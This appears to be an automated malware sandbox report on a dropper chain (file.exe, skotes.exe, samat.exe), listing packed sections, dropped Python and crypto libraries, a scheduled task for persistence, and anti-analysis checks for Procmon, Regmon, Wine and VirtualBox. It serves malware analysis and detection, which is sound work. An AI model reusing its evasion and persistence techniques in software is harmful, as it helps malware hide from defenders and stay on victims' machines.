Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb** source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: samat.exe, 00000008.00000002.4568570169.00007FF8A8792000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb!! source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585287094.00007FF8B9843000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: samat.exe, 00000008.00000002.4587381995.00007FF8BFAC3000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585606922.00007FF8B9F66000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: samat.exe, 00000008.00000002.4583959875.00007FF8B9162000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585930207.00007FF8B9F73000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586952230.00007FF8BA51D000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584962997.00007FF8B93C9000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: samat.exe, 00000008.00000002.4582141897.00007FF8B90FF000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: samat.exe, 00000008.00000002.4582488584.00007FF8B911E000.00000002.00000001.01000000.00000018.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.6c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;
Source: VCRUNTIME140.dll.7.dr Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8DE80 GetModuleHandleW,LoadLibraryW,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree, 8_2_00007FF8B7E8DE80
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: _ghash_clmul.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xac61
Source: _pkcs1_decode.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x10c34
Source: _raw_eksblowfish.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xca96
Source: _chacha20.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x351a
Source: _SHA384.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1655d
Source: _raw_cast.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xc443
Source: md.cp313-win_amd64.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x47a9
Source: _modexp.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x172cd
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1da666 should be: 0x1e3c3d
Source: _SHA256.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x6eb8
Source: _cffi_backend.cp313-win_amd64.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x2f4d9
Source: _raw_ecb.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x4671
Source: _BLAKE2s.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x5f6b
Source: _cpuid_c.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xdccc
Source: _SHA1.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xf079
Source: _SHA224.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1037a
Source: _MD2.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xeba3
Source: _scrypt.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x4714
Source: _raw_des3.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1d746
Source: _RIPEMD160.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x69e1
Source: _raw_ctr.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xdcf9
Source: _ec_ws.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xbf2b1
Source: pywintypes313.dll.7.dr Static PE information: real checksum: 0x0 should be: 0x21b11
Source: _keccak.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xdc9d
Source: file.exe Static PE information: real checksum: 0x1da666 should be: 0x1e3c3d
Source: _Salsa20.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xb9f9
Source: _raw_arc2.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x13220
Source: _curve448.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1a70d
Source: _ARC4.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x9b3a
Source: _raw_aes.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xbec9
Source: _MD4.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x9e2d
Source: _strxor.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x48ff
Source: _ghash_portable.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xe5b7
Source: _raw_cfb.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xed0d
Source: md__mypyc.cp313-win_amd64.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1ee46
Source: _curve25519.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1023e
Source: _poly1305.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xbf54
Source: _ed25519.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x10701
Source: _BLAKE2b.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x120c3
Source: _SHA512.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xdf25
Source: _MD5.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xa544
Source: _raw_aesni.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x646e
Source: win32crypt.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x22ce5
Source: _ed448.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1eae6
Source: _raw_des.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x13f62
Source: _raw_ofb.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x10ea2
Source: _raw_blowfish.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xe4b7
Source: _raw_ocb.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x11289
Source: _raw_cbc.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x5ba2
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: fjmpujlc
Source: file.exe Static PE information: section name: jlhbczjq
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: fjmpujlc
Source: skotes.exe.0.dr Static PE information: section name: jlhbczjq
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: VCRUNTIME140.dll.7.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.7.dr Static PE information: section name: _RDATA
Source: libcrypto-3.dll.7.dr Static PE information: section name: .00cfg
Source: libssl-3.dll.7.dr Static PE information: section name: .00cfg
Source: python313.dll.7.dr Static PE information: section name: PyRuntim
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B802267D push rbx; retf 8_2_00007FF8B8022685
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80227AE push rsp; iretd 8_2_00007FF8B80227B9
Source: file.exe Static PE information: section name: entropy: 7.982732781787212
Source: file.exe Static PE information: section name: fjmpujlc entropy: 7.954406052797792
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.982732781787212
Source: skotes.exe.0.dr Static PE information: section name: fjmpujlc entropy: 7.954406052797792

Persistence and Installation Behavior

barindex
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_overlapped.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des3.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_strxor.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_asyncio.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve448.pyd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cfb.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aes.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ocb.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA224.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_poly1305.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_eksblowfish.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_arc2.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ecb.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2b.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_RIPEMD160.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ctr.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD2.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_keccak.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Protocol\_scrypt.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\python313.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\select.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA1.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\libffi-8.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140_1.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Math\_modexp.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_chacha20.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_portable.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA512.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ofb.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_sqlite3.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_multiprocessing.pyd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed448.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cbc.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32\pywintypes313.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ec_ws.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\libssl-3.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2s.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cast.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA256.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed25519.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\libcrypto-3.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve25519.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_pkcs1_decode.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aesni.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD5.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA384.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_Salsa20.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD4.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\win32\win32crypt.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_clmul.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_blowfish.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_cffi_backend.cp313-win_amd64.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_wmi.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_cpuid_c.pyd
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C76C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError, 7_2_00007FF7E12C76C0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} WHERE ResultClass = Win32_DiskDrive
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk Where DriveType=3
Source: C:\Windows\System32\dxdiag.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
